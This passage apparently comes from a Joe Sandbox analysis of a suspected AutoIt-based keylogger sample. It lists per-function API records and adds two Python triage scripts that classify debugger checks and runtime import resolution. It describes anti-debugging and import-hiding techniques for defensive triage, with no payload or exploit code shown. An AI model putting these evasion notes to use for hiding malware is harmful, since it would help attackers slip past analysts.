                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                      • API String ID: 3158253471-631824599
                                                                                                                      • Opcode ID: b1dc433e52d3a8ad976a804d23f57aadb20a8cebe16e3f43b4b6a066d4049ace
                                                                                                                      • Instruction ID: 4279bb682965b04e387e394b654693e8e10c238ff59a03e7de90342435058a87
                                                                                                                      • Opcode Fuzzy Hash: b1dc433e52d3a8ad976a804d23f57aadb20a8cebe16e3f43b4b6a066d4049ace
                                                                                                                      • Instruction Fuzzy Hash: E0E09270200711CFE720DF68E8047477BE8AF00705F008A7CE856EB642E7B8E508CBA1
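The record above is the function behind the report's "IsDebuggerPresent" and "OutputDebugString,GetLastError" signatures. The string it carries is the fixed message that ATL's CAtlBaseModule constructor emits when its critical section cannot be initialised, so this particular hit is library boilerplate rather than a hand-written debugger check. As an added example (not code from the Joe Sandbox report or from the analysed sample), the Python below parses function records in this plain-text layout and applies that triage rule. The first embedded record is copied from this report; the second is constructed with placeholder addresses to exercise the other branch. The DEBUGGER_CHECK_APIS set and the two result labels are my own choices, not Joe Sandbox fields.

```python
"""Parse Joe Sandbox per-function records (plain-text layout extracted from the
HTML report) and triage debugger-check API usage.
Added example: not part of the Joe Sandbox report or the analysed sample's code."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Headers that open the sub-sections of one function record in the report.
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "[Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<addr>[0-9A-F]+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")
RESIDUE = "Download File"   # widget text the HTML extraction glued onto dump names

# Assumption (my own choice): APIs whose presence deserves an anti-debug look.
DEBUGGER_CHECK_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                       "OutputDebugStringW", "OutputDebugStringA"}
# Fixed message from ATL's CAtlBaseModule constructor: library code, not a check.
ATL_CS_ERROR = "Unable to initialize critical section in CAtlBaseModule"


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None   # address of the nested callee, None for a direct call


@dataclass
class FunctionRecord:
    fields: dict = field(default_factory=dict)      # Similarity / dump metadata
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)

    def api_names(self) -> set[str]:
        return {a.name for a in self.apis}

    def direct_api_names(self) -> set[str]:
        return {a.name for a in self.apis if a.subcall_of is None}


def parse_records(text: str) -> list[FunctionRecord]:
    """Each record opens with its 'APIs' header and closes with the Similarity block."""
    records: list[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue                         # page chrome outside any record
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                            args, m.group("ref"), m.group("sub")))
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                current.strings.append((m.group("text"), m.group("addr")))
        else:
            m = KV_RE.match(item)
            if m:
                key, value = m.group("key"), m.group("value")
                if value.endswith(RESIDUE):
                    value = value[:-len(RESIDUE)]
                if key == "Associated":      # several dump regions per record
                    current.fields.setdefault(key, []).append(value)
                else:
                    current.fields[key] = value
    return records


def triage_debugger_check(rec: FunctionRecord) -> str | None:
    """None: no debugger-check API; 'library-boilerplate': the ATL pattern
    (fixed error string plus InitializeCriticalSectionAndSpinCount); else 'review'."""
    if not rec.api_names() & DEBUGGER_CHECK_APIS:
        return None
    atl_string = any(ATL_CS_ERROR in text for text, _ in rec.strings)
    if atl_string and "InitializeCriticalSectionAndSpinCount" in rec.api_names():
        return "library-boilerplate"
    return "review"


# Constructed sample: record 1 is copied from this report, record 2 is made up
# with placeholder addresses (00401xxx) to show a hit that is not ATL boilerplate.
SAMPLE = """\
APIs
  • Part of subcall function 0005B314: _memset.LIBCMT ref: 0005B321
  • Part of subcall function 00040940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0005B2F0,?,?,?,0002100A), ref: 00040945
• IsDebuggerPresent.KERNEL32(?,?,?,0002100A), ref: 0005B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0002100A), ref: 0005B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0005B2FE
Memory Dump Source
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API String ID: 3158253471-631824599
• Opcode ID: b1dc433e52d3a8ad976a804d23f57aadb20a8cebe16e3f43b4b6a066d4049ace
APIs
• IsDebuggerPresent.KERNEL32(?), ref: 00401010
• ExitProcess.KERNEL32(00000001), ref: 00401020
Strings
Similarity
• API String ID: 0-0
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("Opcode ID", "?")[:12], sorted(rec.api_names()),
              triage_debugger_check(rec))
```

Run it on the text of a whole report and only the records labelled "review" need a look; the ATL constructor hit is filtered out by its own strings rather than by address, so the rule survives re-compilation of the runtime.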
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00077C82
                                                                                                                        • Part of subcall function 00043358: _doexit.LIBCMT ref: 00043362
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 8cb680f9b554db343c58b1475ace4ff0e3fdbe3a9cdd8963536d3a818d21a77c
• Instruction ID: cdbd4aa51195e857b8205718b479dd956aec46b00b3dce60f7f477adf4fa5182
• Opcode Fuzzy Hash: 8cb680f9b554db343c58b1475ace4ff0e3fdbe3a9cdd8963536d3a818d21a77c
• Instruction Fuzzy Hash: 91D05B323C831836D11532A57D07FDA79884F05B52F044476FB0C9D5D349E5459041FD

APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00061775
  • Part of subcall function 0009BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0006195E,?), ref: 0009BFFE
  • Part of subcall function 0009BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0009C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0006196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: 654aeae33d2934931fea41624fbaf8b0b924e893a04ba43af2ac59083ce1273c
• Instruction ID: 8438e6d2126770c5e0960d0e267536c8d2c003a0e68e0b468653256337f2d5bc
• Opcode Fuzzy Hash: 654aeae33d2934931fea41624fbaf8b0b924e893a04ba43af2ac59083ce1273c
• Instruction Fuzzy Hash: 5DF0C971804109DFEB65DB91D998AECBBF9AB18301F580095E102A60A1D7755F84DF60

APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000A596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000A5981
  • Part of subcall function 00085244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 5adbe87c77198992df0b7ee2be754416990c446f35c8ca019d98bb6634811255
• Instruction ID: 9f5da3c545fd5fa98a0289c0a1a761937b3246fbb904fe8369e8c9f08bddf840
• Opcode Fuzzy Hash: 5adbe87c77198992df0b7ee2be754416990c446f35c8ca019d98bb6634811255
• Instruction Fuzzy Hash: 29D0C935784B12B6E664BBB0AC4FFE66A54BB01B51F000825B349AA1D5C9E49800C764

APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000A59AE
• PostMessageW.USER32(00000000), ref: 000A59B5
  • Part of subcall function 00085244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: f9b3aaae2e07ba9db680c1d6bcba02e655a2d8163e6c9ac34e958cde3b91449d
• Instruction ID: 2785d8b5f6f281fef2d49fefba0451ef93b1273ee2ae9e037f993164d181455b
• Opcode Fuzzy Hash: f9b3aaae2e07ba9db680c1d6bcba02e655a2d8163e6c9ac34e958cde3b91449d
• Instruction Fuzzy Hash: 24D0C931780B127AF664BBB0AC4FFE66654BB06B51F000825B345AA1D5C9E4A800C768
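Two call patterns recur in the records above. The first function loads kernel32.dll with LoadLibraryA and looks up GetSystemWow64DirectoryW by name with GetProcAddress instead of importing it, so the symbol never appears in the PE import table and only surfaces in dynamic traces like this one. The other two functions locate the taskbar with FindWindowW("Shell_TrayWnd") and post a message to it; in the second record the message is 0x0111, which is WM_COMMAND, while in the third the arguments are unresolved ("?" or missing) and the report does not say which command is posted. Given the AutoIt markers elsewhere in this report, both patterns are consistent with the AutoIt runtime's own window and system helpers rather than with the keylogger payload itself. The following is an added triage helper, not Joe Sandbox code and not part of the sample: it parses function records in the layout shown here (reading only the APIs and Similarity sections), flags functions that resolve imports at runtime, lists the symbols they resolve, and extracts fully resolved taskbar commands while skipping unresolved ones. The embedded input is an excerpt of the three records above; WM_COMMAND is the only message constant it interprets.

```python
"""Pull API call sequences out of a Joe Sandbox function-record text dump.

Added triage helper; it is not Joe Sandbox code and reads only the 'APIs' and
'Similarity' sections in the layout shown above ('•' bullets, sub-bullets of
the form 'Part of subcall function <addr>: <call>').
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)$")
WM_COMMAND = 0x0111  # the only window message this helper interprets
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]            # as printed; '?' marks an unresolved argument
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # sub-function address for 'Part of subcall' lines


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)


def parse_records(text: str) -> List[FunctionRecord]:
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            # 'APIs' opens a record; an earlier header belongs to a record
            # whose beginning lies outside the dump (as at the top above).
            if line == "APIs" or current is None:
                current = FunctionRecord()
                records.append(current)
            section = line
        elif line.startswith("•") and current is not None:
            body = line.lstrip("•").strip()
            if section == "APIs" and (m := API_RE.match(body)):
                current.apis.append(ApiCall(
                    m["name"], m["module"],
                    [a.strip() for a in m["args"].split(",")],
                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
            elif section == "Similarity":
                key, _, value = body.partition(":")
                current.similarity[key.strip()] = value.strip()
    return records


def resolves_imports_at_runtime(rec: FunctionRecord) -> bool:
    """True when one function both loads a module and calls GetProcAddress."""
    names = {c.name for c in rec.apis}
    return "GetProcAddress" in names and bool(names & LOADERS)


def runtime_resolved_symbols(rec: FunctionRecord) -> List[str]:
    """Symbol names passed as the second argument of GetProcAddress."""
    return [c.args[1] for c in rec.apis
            if c.name == "GetProcAddress" and len(c.args) > 1 and c.args[1] != "?"]


def taskbar_commands(rec: FunctionRecord) -> List[Tuple[int, int]]:
    """(message, wParam) of fully resolved PostMessage calls in a function that
    locates the taskbar with FindWindow('Shell_TrayWnd'); calls with unresolved
    arguments are skipped rather than guessed."""
    if not any(c.name.startswith("FindWindow") and c.args[:1] == ["Shell_TrayWnd"]
               for c in rec.apis):
        return []
    return [(int(c.args[1], 16), int(c.args[2], 16)) for c in rec.apis
            if c.name.startswith("PostMessage") and len(c.args) == 4
            and "?" not in c.args]


# Excerpt of the three records above in the cleaned layout (constructed input).
SAMPLE = """\
Similarity
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00061775
  • Part of subcall function 0009BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0006195E,?), ref: 0009BFFE
  • Part of subcall function 0009BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0009C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0006196D
Strings
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000A596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000A5981
  • Part of subcall function 00085244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
Similarity
• String ID: Shell_TrayWnd
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000A59AE
• PostMessageW.USER32(00000000), ref: 000A59B5
Similarity
• String ID: Shell_TrayWnd
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, [c.name for c in rec.apis], runtime_resolved_symbols(rec),
              [f"msg=0x{m:X} wParam=0x{w:X}" for m, w in taskbar_commands(rec)])
```

Run against a full report export, the same parser turns thousands of records into a short list of functions worth opening in the disassembler: those that resolve imports at runtime, and the symbols they resolve, are usually a better starting point than the fuzzy hashes.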